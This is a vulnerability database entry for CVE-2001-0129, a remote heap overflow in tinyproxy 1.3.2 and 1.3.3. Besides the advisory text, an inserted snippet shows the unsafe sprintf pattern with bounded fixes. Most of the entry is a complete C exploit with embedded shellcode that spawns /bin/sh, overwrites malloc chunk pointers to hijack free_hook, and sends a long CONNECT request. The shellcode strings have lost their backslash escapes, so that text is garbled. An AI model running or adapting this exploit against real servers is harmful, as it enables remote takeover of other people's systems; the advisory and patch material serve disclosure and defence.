Tinyproxy HTTP Proxy Buffer Overflow Vulnerability

Vulnerability ID 1106176 Vulnerability type Buffer overflow
Published 2001-01-17 Updated 2005-05-02
CVE ID CVE-2001-0129
CNNVD-ID CNNVD-200103-036
Platform Windows CVSS score 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/20559
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-036
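|Vulnerability details
Tinyproxy HTTP proxy 1.3.3 and earlier contain a buffer overflow vulnerability. A remote attacker can cause a denial of service, and possibly execute arbitrary commands, via an overly long connect request.
|Exploit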
source: http://www.securityfocus.com/bid/2217/info

Versions 1.3.2 and 1.3.3 of tinyproxy, a small HTTP proxy, exhibit a vulnerability to heap overflow attacks.

A failure to properly validate user-supplied input that is passed as an argument to a call to sprintf() can allow an unexpectedly large amount of input to be written to a buffer (used to display error messages), past the boundary of the space allocated for it on the heap.

As a result, it may be possible to execute a denial of service attack, or even to execute arbitrary commands if certain internal memory structures can be successfully overwritten. 
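The unbounded sprintf() into a heap-allocated error-message buffer described above, beside two bounded replacements. This is an added example, not tinyproxy's code and not part of the original advisory; the message text, buffer size, echo cap and function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ERRBUF_SIZE 1024  /* hypothetical size of the error-message buffer */
#define MAX_ECHO    256   /* hypothetical cap on request bytes echoed back */
#define ERR_FMT     "Unknown URL type: "  /* hypothetical message text */

/* Unsafe pattern from the advisory (contrast only, not compiled):
 *     sprintf(buf, ERR_FMT "%s", url);   buf = malloc(ERRBUF_SIZE), url unchecked */

/* Fix 1: bounded write; returns 0 if the message fit, -1 if it was truncated. */
int format_error_bounded(char *buf, size_t size, const char *url)
{
    int n = snprintf(buf, size, ERR_FMT "%.*s", MAX_ECHO, url);
    return (n < 0 || (size_t)n >= size) ? -1 : 0;
}

/* Fix 2: measure first, then allocate exactly what the message needs. */
char *format_error_alloc(const char *url)
{
    int n = snprintf(NULL, 0, ERR_FMT "%s", url);
    char *buf = (n < 0) ? NULL : malloc((size_t)n + 1);
    if (buf) snprintf(buf, (size_t)n + 1, ERR_FMT "%s", url);
    return buf;
}

/* Builds a constructed request target of url_len 'A' bytes and returns the
 * length of the message stored in a heap buffer of buf_size bytes. */
size_t stored_len(size_t url_len, size_t buf_size)
{
    char *url = malloc(url_len + 1), *buf = malloc(buf_size);
    size_t out = 0;
    if (url && buf) {
        memset(url, 'A', url_len);
        url[url_len] = '\0';
        format_error_bounded(buf, buf_size, url);
        out = strlen(buf);
    }
    free(url);
    free(buf);
    return out;
}

int main(void)
{
    printf("%zu\n", stored_len(5000, ERRBUF_SIZE));
    return 0;
}
```

With either fix, the number of bytes written is decided by the buffer size or the measured length, never by the length of the request.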

/*
 * Exploit for tinyproxy 1.3.2 and 1.3.3
 * by |CyRaX| <[email protected]>
 * Packet Knights Crew - www.pkcrew.org
 * READ THE ADVISORY FIRST !
 * Greetz :
 *  bikappa: for some help
 *  all the pkc members expecially recidjvo, asynchro and cthulhu
 *  all the other friends
*/


#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>

char jmps[]="xebx0e";

char c0de[]="xebx0ex90x90x90x90x90x90x90x90x90x90x90x90x90x90"
            "x90x90x90x90x90x90x90"
            "x89xe5"
            "x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"
            "x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"
            "x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0"
            "x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd"
            "x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9"
            "x80xeax27x89xd0xcdx80x89xd0x41xcdx80xebx1fx5e"
            "x80x46x04x01"
            "x80x06x01"
            "x89x75"
            "x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08"
            "x8dx55x0cxcdx80xe8xdcxffxffxffx2ex62x69x6ex2ex73x68";

void usage();

void usage(){
   printf("Exploit for Tinyproxy 1.3.2 and 1.3.3 by |CyRaX| <[email protected]>\n");
   printf("Packet Knights Crew - http://www.pkcrew.org\n");
   printf("please.. READ the advisory first!\n");
   printf("Usage : ./PKCtiny-ex <host> <port> <buf_size> <struct offset> <free_hook> <shellcode>\n");
   printf("buf_size is the size of the buf we send\n");
   printf("struct offset is the distance from the beginning of the buffer we send where we\n");
   printf("       we put the malloc chunk struct!\n");
   printf("free_hook is the address of the free_hook function pointer\n");
   printf("shellcode is the address of the shellcode (you don't neet to hit it correctly\n");
   printf("          you can just hope to it a jump\n");
   printf("\nfree_hook and shellcode must be given in 0xaddress format\n");
   exit(0);
}

int main(int argc, char **argv){
   int s,i,err,pid[5];
   struct sockaddr_in dst;
   struct malloc_chunk{
      unsigned int ps;
      unsigned int sz;
      struct malloc_chunk *fd;
      struct malloc_chunk *bk;
   }mc;
   char *magic,*sndbuff;
   unsigned long FREE_HOOKZ,SHELLCODE;
   if(argc<5)usage();
   magic=(char *)malloc(atoi(argv[3])+1);
   sndbuff=(char *)malloc(atoi(argv[3])+30);
   memset(magic,'x90',atoi(argv[3]));

   SHELLCODE=strtol(argv[6],NULL,16);
   FREE_HOOKZ=strtol(argv[5],NULL,16);


   dst.sin_addr.s_addr=inet_addr(argv[1]);
   dst.sin_port=htons(atoi(argv[2]));
   dst.sin_family=AF_INET;
   mc.ps=0xffffffff & ~1;
   mc.sz=0xffffffff;
   mc.fd=(struct malloc_chunk *)(SHELLCODE);
   mc.bk=(struct malloc_chunk *)(FREE_HOOKZ-8);

   s=socket(AF_INET,SOCK_STREAM,0);
   connect(s,(struct sockaddr *)&dst,sizeof(dst));
   memcpy(magic+atoi(argv[4]),&mc,sizeof(mc));

   if((atoi(argv[3])/2)<atoi(argv[4])){
      /* putting jmps and shellcode before the struct */
      for(i=0;i<(atoi(argv[4])-strlen(c0de)-10);i+=2){
	 memcpy(magic+i,jmps,2);
      }
   }
   else {
      /* putting jmps and shellcode after the struct */
      for(i=atoi(argv[4])+sizeof(mc);i<atoi(argv[3])-10-strlen(c0de);i+=2){
	 memcpy(magic+i,jmps,2);
      }
   }
   memcpy(magic+i,c0de,strlen(c0de));

   magic[atoi(argv[3])]=0;

   printf("strlen magic is %in",strlen(magic));
   sndbuff[snprintf(sndbuff,atoi(argv[3])+20,"connect %s://n",magic)]=0;
   printf("shootingn");
   err=send(s,sndbuff,strlen(sndbuff),0);
}
|References

Source: BID
Name: 2217
Link: http://www.securityfocus.com/bid/2217
Source: DEBIAN
Name: DSA-018
Link: http://www.debian.org/security/2001/dsa-018
Source: BUGTRAQ
Name: 20010117 [pkc] remote heap overflow in tinyproxy
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=97975486527750&w=2
Source: XF
Name: tinyproxy-remote-bo(5954)
Link: http://xforce.iss.net/static/5954.php